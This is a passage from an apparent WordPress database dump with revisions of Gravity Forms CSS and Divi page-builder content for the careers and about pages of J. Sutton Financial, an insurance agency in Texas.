padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: auto;\r\n    font-size: 18px;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 18px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n    width: max-content;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .ginput_container {\r\n    max-width: max-content;\r\n    display: inline-block;\r\n    margin-left: 10px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    display: none !important;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-04-04 00:27:42','2023-04-04 00:27:42','',35,'http://cmdev-site1.com/?p=755',0,'revision','',0),(756,1,'2023-04-04 00:28:17','2023-04-04 00:28:17','.gform_wrapper.gravity-theme .gform_footer button, .gform_wrapper.gravity-theme .gform_footer input {color: #FFFFFF!important;\r\n    border-width: 0px!important;\r\n    border-color: RGBA(255,255,255,0);\r\n    border-radius: 14px;\r\n    font-size: 20px;\r\n    background-color: #003372;\r\n	padding: 10px;\r\n}\r\n.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: auto;\r\n    font-size: 18px;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 18px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n    width: max-content;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .ginput_container {\r\n    max-width: max-content;\r\n    display: inline-block;\r\n    margin-left: 10px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    display: none !important;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-04-04 00:28:17','2023-04-04 00:28:17','',35,'http://cmdev-site1.com/?p=756',0,'revision','',0),(757,1,'2023-04-04 00:28:50','2023-04-04 00:28:50','.gform_wrapper.gravity-theme .gform_footer button, .gform_wrapper.gravity-theme .gform_footer input {color: #FFFFFF!important;\r\n    border-width: 0px!important;\r\n    border-color: RGBA(255,255,255,0);\r\n    border-radius: 14px;\r\n    font-size: 20px;\r\n    background-color: #003372;\r\n	padding: 10px 15px 15px 10px;\r\n}\r\n.gform_wrapper.tc_wrapper {\r\n    width: 800px;\r\n    margin: 0 auto;\r\n    background: #fff;\r\n    padding: 30px;\r\n    border: 1px solid rgba(0,0,0,.1);\r\n    border-radius: 8px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_heading {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    padding: 0;\r\n    font-weight: 700;\r\n    text-align: center;\r\n    color: #000;\r\n    font-size: 26px;\r\n    margin-bottom: 30px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    display: grid;\r\n    grid-template-columns: 5fr 7fr;\r\n    column-gap: 40px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    padding: 0;\r\n    font-size: 13px;\r\n    color: #000;\r\n    line-height: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_label, .gform_wrapper.tc_wrapper .gfield.two_box .validation_message {\r\n    grid-column: 1/-1;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    border: 1px solid #999;\r\n    outline: none;\r\n    border-radius: 5px;\r\n    padding: 12px 15px;\r\n    font-size: 15px !important;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=text]:focus, .gform_wrapper.tc_wrapper input[type=email]:focus, .gform_wrapper.tc_wrapper input[type=tel]:focus, .gform_wrapper.tc_wrapper input[type=number]:focus {\r\n    border-color: #333;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper input[type=number]::-webkit-outer-spin-button, .gform_wrapper.tc_wrapper input[type=number]::-webkit-inner-spin-button {\r\n    -webkit-appearance: none;\r\n    -moz-appearance: textfield;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    font-weight: 600;\r\n    color: #000;\r\n    font-size: 14px;\r\n    margin: 0;\r\n    max-width: 40%;\r\n    line-height: 18px;\r\n    margin-bottom: 5px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio .gchoice input[type=radio] {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio {\r\n    display: grid;\r\n    grid-template-columns: 1fr 1fr;\r\n    gap: 16px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio label {\r\n    width: 100%;\r\n    max-width: 100%;\r\n    border: 1px solid #666;\r\n    text-align: center;\r\n    color: #333;\r\n    padding: 10px;\r\n    border-radius: 5px;\r\n    cursor: pointer;\r\n    transition: 0.3s;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.btn_box .gfield_radio input:checked + label {\r\n    background: #e3e1e1;\r\n    color: #000;\r\n    border-color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    padding: 0;\r\n    margin: 40px 0 0 0;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit] {\r\n    margin: 0;\r\n    padding: 12px 50px;\r\n    border: 1px solid #000;\r\n    background: #000;\r\n    border-radius: 5px;\r\n    color: #fff;\r\n    font-size: 16px;\r\n    text-transform: uppercase;\r\n    font-weight: 600;\r\n    transition: 0.3s;\r\n    cursor: pointer;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label input[type=submit]:hover {\r\n    background: #333;\r\n}\r\n\r\n\r\n.gform_wrapper.tc_wrapper .gform_validation_errors {\r\n    display: none;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield_error .validation_message {\r\n    border: none;\r\n    background: transparent;\r\n    color: #C02B0A !important;\r\n    margin-top: 5px;\r\n    padding: 0;\r\n    font-size: 14px;\r\n}\r\np.qut {\r\n    font-size: 24px;\r\n    color: #000;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .gfield_label {\r\n    width: auto;\r\n    font-size: 18px;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn input {\r\n    border: none;\r\n    padding: 0;\r\n    font-size: 18px !important;\r\n    font-weight: 700;\r\n    color: #000;\r\n    width: max-content;\r\n    max-width: max-content;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.q_btn .ginput_container {\r\n    max-width: max-content;\r\n    display: inline-block;\r\n    margin-left: 10px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gform_footer.top_label {\r\n    display: none !important;\r\n}\r\n\r\n\r\n@media only screen and (max-width: 767px) { \r\n	\r\n.gform_wrapper.tc_wrapper {\r\n    width: 100%;\r\n    padding: 18px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper h3 {\r\n    font-size: 18px;\r\n    margin-bottom: 20px;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box {\r\n    grid-template-columns: 1fr;\r\n}\r\n\r\n.gform_wrapper.tc_wrapper .gfield.two_box .gfield_description {\r\n    margin-top: 15px;\r\n}\r\n.gform_wrapper.tc_wrapper input[type=text], .gform_wrapper.tc_wrapper input[type=email], .gform_wrapper.tc_wrapper input[type=tel], .gform_wrapper.tc_wrapper input[type=number] {\r\n    padding: 6px 15px;\r\n}\r\n.gform_wrapper.tc_wrapper .gfield .gfield_label {\r\n    max-width: 100%;\r\n}','Divi','','inherit','closed','closed','','35-revision-v1','','','2023-04-04 00:28:50','2023-04-04 00:28:50','',35,'http://cmdev-site1.com/?p=757',0,'revision','',0),(760,1,'2023-04-04 01:11:17','2023-04-04 01:11:17','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_fullwidth_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" title_text=\"Justin Conference 2 Cropped\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_fullwidth_image][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-04 01:11:17','2023-04-04 01:11:17','',38,'http://cmdev-site1.com/?p=760',0,'revision','',0),(758,1,'2023-04-04 01:10:39','2023-04-04 01:10:39','[et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.16\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|auto||118px||\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Thought-Bubbles.png\" alt=\"thought bubbles\" title_text=\"Thought Bubbles\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"70%\" custom_margin=\"|||70px||\" animation_style=\"slide\" animation_direction=\"right\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" header_2_text_align=\"center\" global_colors_info=\"{}\"]<h2><strong>WE ARE HIRING!</strong></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Opportunities with American Income Life is truly unlimited. J. Sutton Financial is currently operating throughout Texas and we are rapidly expanding. We are looking for hard-working, dedicated individuals to join our organization.</p>\n<p>We offer a fun, competitive, family-like atmosphere, with plenty of room for growth.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"2px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][gravityform id=\"2\" title=\"true\"][/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta title=\"Benefits Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#000000\" background_enable_color=\"off\" background_layout=\"light\" min_height=\"280px\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" global_colors_info=\"{}\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\">Service clients across the state of Texas by offering valuable benefits that protect families during troubling times.</p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta title=\"Sales Manager Trainee\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#000000\" background_enable_color=\"off\" background_layout=\"light\" height=\"280px\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" global_colors_info=\"{}\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Learn to lead, train, and set examples for your own team of agents. Work towards monthly goals and collaborate with managers on a daily basis to achieve record breaking results. </span></p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta title=\"Call Center Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#000000\" background_enable_color=\"off\" background_layout=\"light\" height=\"280px\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" global_colors_info=\"{}\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Assist our agents with appointment scheduling and client outreach. Work side by side with agents to help achieve team goals.</span></p>\n</div>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][et_pb_fullwidth_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/04/Justin-Conference-2-Cropped.png\" _builder_version=\"4.20.2\" _module_preset=\"default\" theme_builder_area=\"post_content\" title_text=\"Justin Conference 2 Cropped\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_fullwidth_image][/et_pb_section]','Careers','','inherit','closed','closed','','38-revision-v1','','','2023-04-04 01:10:39','2023-04-04 01:10:39','',38,'http://cmdev-site1.com/?p=758',0,'revision','',0),(759,1,'2023-04-04 01:11:08','2023-04-04 01:11:08','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" template_type=\"section\"][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta title=\"Benefits Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#000000\" background_enable_color=\"off\" background_layout=\"light\" min_height=\"280px\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" global_colors_info=\"{}\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\">Service clients across the state of Texas by offering valuable benefits that protect families during troubling times.</p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta title=\"Sales Manager Trainee\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#000000\" background_enable_color=\"off\" background_layout=\"light\" height=\"280px\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" global_colors_info=\"{}\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Learn to lead, train, and set examples for your own team of agents. Work towards monthly goals and collaborate with managers on a daily basis to achieve record breaking results. </span></p>\n</div>[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_cta title=\"Call Center Specialist\" _builder_version=\"4.20.2\" _module_preset=\"default\" header_text_color=\"#000000\" background_enable_color=\"off\" background_layout=\"light\" height=\"280px\" box_shadow_style=\"preset2\" box_shadow_color=\"rgba(0,51,114,0.97)\" global_colors_info=\"{}\"]<div id=\"comp-l6v9zah1\" class=\"KcpHeO tz5f0K comp-l6v9zah1 wixui-rich-text\" data-testid=\"richTextElement\">\n<p class=\"font_6\"><span>Assist our agents with appointment scheduling and client outreach. Work side by side with agents to help achieve team goals.</span></p>\n</div>[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section]','Careers','','publish','closed','closed','','careers-2','','','2023-04-04 01:11:08','2023-04-04 01:11:08','',0,'http://cmdev-site1.com/et_pb_layout/careers-2/',0,'et_pb_layout','',0),(765,3,'2023-04-04 11:50:10','2023-04-04 11:50:10','[et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][dsm_perspective_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Shaking-Hands-Icon-No-Background-Hex-666666-scaled.jpg\" alt=\"handshake icon\" title_text=\"Shaking Hands Icon No Background Hex 666666\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"-31px|||||\" animation_style=\"flip\" animation_direction=\"right\" global_colors_info=\"{}\"][/dsm_perspective_image][/et_pb_column][et_pb_column type=\"2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"48px|||||\" global_colors_info=\"{}\"]<p>At J. Sutton Financial, our insurance products and services are backed by a promise.</p>\n<p>A Promise of: Financial security and protection for our clients. Commitment and fairness to our agents. Respect and opportunity for our employees. We are committed to bringing a quality product to market while providing the best service at the lowest possible cost.</p>\n<p>&nbsp;</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/About-American-Life-Insurance-Muted-scaled.jpg\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_3,2_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"66px||66px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_3\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_2_text_align=\"center\" header_2_text_color=\"#FFFFFF\" min_height=\"8px\" custom_margin=\"32px|||||\" global_colors_info=\"{}\"]<h2>About American Income Life Insurance 